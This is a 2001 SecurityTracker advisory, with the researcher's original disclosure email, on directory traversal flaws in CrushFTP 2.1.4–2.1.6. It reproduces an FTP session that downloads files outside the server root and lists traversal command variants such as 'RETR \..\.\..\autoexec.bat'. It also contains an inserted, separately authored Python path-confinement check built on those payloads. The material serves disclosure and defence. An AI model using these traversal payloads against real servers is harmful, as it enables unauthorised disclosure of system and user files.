SecurityTracker.com
Category:   Application (File Transfer/Sharing)  >   CrushFTP
Vendors:   Spink, Ben
CrushFTP Java-based FTP Server Lets Remote Users Change Directories and Download Files Outside of the FTP Server's Root Document Directory
SecurityTracker Alert ID:  1001475
SecurityTracker URL:  http://securitytracker.com/id/1001475
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 3 2001
Impact:   Disclosure of system information, Disclosure of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.1.4, 2.1.5, 2.1.6
Description:   It was reported that there are multiple vulnerabilities in the Java-based CrushFTP server that allow remote users to change directories and download files outside of the server's root document directory.

By using path components such as ".." or "..." in command arguments, a remote user can break out of the FTP server's root document directory.

The following transaction record illustrates the vulnerability ("c:\directory\directory" was used as the FTP root directory).

>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK. Need password.
Password:
230-Welcome!
230 Password OK. Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

In addition to v2.1.4, two other intermediate versions (v2.1.5, v2.1.6) contain vulnerabilities with the following commands:

NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat
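The variants listed above show why a blacklist of the literal string ".." is not a fix: backslashes, mixed "./" and "\" separators, and the "..." component all reach the filesystem unless the server resolves the path itself and checks the result against its root. The following is an added example (not CrushFTP's code, and not from the advisory's author) of that confinement check; the payload list is constructed from the commands quoted above, and the function and exception names are this example's own.

```python
"""Confining client-supplied FTP paths to a virtual root.

Added example for this advisory; it is not CrushFTP code. It models the
checks a server must run on the argument of CWD, RETR, NLST or SIZE before
touching the filesystem: both separator styles are unified, "." and ".."
are resolved logically, and any result outside the root is refused.
"""
from __future__ import annotations

import re


class PathEscape(ValueError):
    """Raised when a client path would leave the virtual root."""


# Any component made only of three or more dots. Some Windows filesystem
# layers treat "..." as a multi-level parent reference, so it is refused
# outright rather than passed through as an ordinary file name.
DOT_RUN = re.compile(r"\.{3,}")


def resolve_virtual(cwd: str, requested: str) -> str:
    """Return the canonical '/'-rooted virtual path for ``requested``.

    ``cwd`` is the client's current virtual directory ('/'-rooted).
    Raises PathEscape if the path climbs above the root or uses a
    component the server cannot interpret safely.
    """
    # A Java server on Windows that concatenates the raw argument lets the
    # OS interpret '\' as a separator, so normalise it before resolving.
    unified = requested.replace("\\", "/")
    base = "/" if unified.startswith("/") else cwd
    stack = [c for c in base.split("/") if c]
    for comp in unified.split("/"):
        if comp in ("", "."):
            continue                      # doubled slash or self-reference
        if comp == "..":
            if not stack:                 # already at the root: escape attempt
                raise PathEscape(f"{requested!r} climbs above the root")
            stack.pop()                   # legitimate parent inside the root
            continue
        if DOT_RUN.fullmatch(comp):
            raise PathEscape(f"{requested!r} uses dot-only component {comp!r}")
        if ":" in comp or "\0" in comp:
            # ':' introduces drive letters and NTFS alternate data streams on
            # Windows; NUL truncates the name in C-based file APIs.
            raise PathEscape(f"{requested!r} contains a forbidden character")
        stack.append(comp)
    return "/" + "/".join(stack)


def to_os_path(root: str, virtual: str) -> str:
    """Map a confined virtual path onto the configured root directory."""
    root = root.rstrip("/\\")
    sep = "\\" if "\\" in root else "/"
    return root + virtual.replace("/", sep)


# Constructed from the transcript and command list in the advisory above:
# (client cwd, argument exactly as the client sent it).
PAGE_PAYLOADS = [
    ("/", "../../autoexec.bat"),         # get ../../autoexec.bat
    ("/", "..."),                        # cd ...  /  NLST ...
    ("/", ".."),                         # NLST ..
    ("/", "/../../"),                    # SIZE /../../
    ("/", "/.../"),                      # SIZE /.../
    ("/", "\\..\\"),                     # NLST \..\
    ("/", "/../"),                       # NLST /../
    ("/", "\\...\\"),                    # NLST \...\
    ("/", "\\..\\.\\..\\autoexec.bat"),  # RETR \..\.\..\autoexec.bat
    ("/", "./\\...\\autoexec.bat"),      # RETR ./\...\autoexec.bat
    ("/", ".\\.\\..\\..\\autoexec.bat"), # RETR .\.\..\..\autoexec.bat
]


def check_payloads(payloads=PAGE_PAYLOADS) -> list[tuple[str, str]]:
    """Run each argument through the resolver; return (arg, verdict) pairs."""
    verdicts = []
    for cwd, arg in payloads:
        try:
            verdicts.append((arg, "accepted: " + resolve_virtual(cwd, arg)))
        except PathEscape as exc:
            verdicts.append((arg, "rejected: " + str(exc)))
    return verdicts


if __name__ == "__main__":
    root = "c:\\directory\\directory"    # the advisory's example FTP root
    for arg, verdict in check_payloads():
        print(f"{arg:28} -> {verdict}")
    ok = resolve_virtual("/pub/docs", "../readme.txt")
    print("legitimate '..' inside root:", ok, "->", to_os_path(root, ok))
```

Two design points: ".." is allowed when it stays inside the root, so normal clients still work, but a ".." that would pop past the root is refused with an error rather than silently clamped, which makes the attempt visible in the server log. The resolution is purely logical, so it does not see symbolic links or Windows junctions; a real server should additionally canonicalize the final OS path (for example with os.path.realpath, or Path.toRealPath in Java) and check that it still starts with the root before opening anything.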

Impact:   A remote user can obtain files and directory listings outside of the FTP server's root document directory.
Solution:   Upgrade to v2.1.7, available via the Vendor URL.
Vendor URL:  www.crushftp.com/
Cause:   Access control error, Input validation error
Underlying OS:   Java

Message History:   None.


 Source Message Contents

Date:  Thu, 3 May 2001 13:13:40 -0800 (PDT)
Subject:  Vulnerabilities in CrushFTP Server



----- Begin Hush Signed Message from joetesta@hushmail.com -----

Vulnerabilities in CrushFTP Server



    Overview

CrushFTP Server 2.1.4 is a java ftp server available from
http://www.crushftp.com.  Multiple vulnerabilities exist which allow
users to change directories outside of the ftp root and download files.



    Details

The following is an illustration of the problem.  An ftp root of
"c:\directory\directory" was used.

>ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-Welcome to CrushFTP!
220 CrushFTP Server Ready.
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Username OK.  Need password.
Password:
230-Welcome!
230 Password OK.  Connected.
ftp> get ../../autoexec.bat
200 PORT command successful. 127.0.0.1:1868
150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
226-Download File Size:419 bytes @ 0K/sec.
226 Transfer complete.
ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
ftp> cd ...
250 "/.../" CWD command successful.
ftp> get command.com
200 PORT command successful. 127.0.0.1:1870
150 Opening ASCII mode data connection for command.com (93890 bytes).
226-Download File Size:93890 bytes @ 92K/sec.
226 Transfer complete.
ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.


The vendor issued two versions since I made initial contact to address
additional variations.  The following is a list of vulnerabilities which
affected these intermediate versions (v2.1.5, v2.1.6):

NLST ..
NLST ...
SIZE /../../
SIZE /.../
NLST \..\
NLST /../
NLST \...\
RETR \..\.\..\autoexec.bat
RETR ./\...\autoexec.bat
RETR .\.\..\..\autoexec.bat



    Solution

Upgrade to v2.1.7 at:
http://www.crushftp.com



    Vendor Status

The program author, Ben Spink, was contacted via <spinkb@mac.com> on
Friday, April 20, 2001.  I would like to thank him for taking this
matter seriously and showing extra effort to resolve these problems.



    - Joe Testa

e-mail:   joetesta@hushmail.com
web page: http://hogs.rit.edu/~joet
AIM:      LordSpankatron


----- Begin Hush Signature v1.3 -----
H4DN+gBMDsfVP0qnC4F8dEdXR7FSneNzs2Now6Thibu+zett3cgrNijdAG77GWmeUrvE
/eoSsg0s6IjBVwrVZXt0CN2XVslnxRwCxpPWAwfVgrQGSGigcRInv/WxWhxA0xEhiffv
Wc3ZnhtPy0toe7N4XKyma58FwlqVRsXKqc5bJgBQquX0wlsnrLkpK3nSVhBBj/NkEkpG
yoyaLAXBNVtfZz+AEdR6iuMZYVdIpsHToi4x5hT6cZNZtjD+MWT8vFT3SsAi0NQ6PqpI
0p6HB8uNJ3ra/oExJleegIDWkJMN/AoIhjuxlrCJxt2yu0CHVeUt+7c353Nv38C8QQvm
bkkLdHMxMj6VvY99mnhyuBcXuJrGigPIguZAp6GER1uARXrv4w0RJ0QIeuB5JI4LXwBb
sIFfCcy/boBIg3QNOPP/eoxGTQ7XCpPBcfXUHrPtk/Xd06XJ/9XhBC+fLzGgHMEE37hH
wbPXMDaJ6OvogRLDVunx+UVJiqjybft960vFm2lgXd75
----- End Hush Signature v1.3 -----

Copyright 2013, SecurityGlobal.net LLC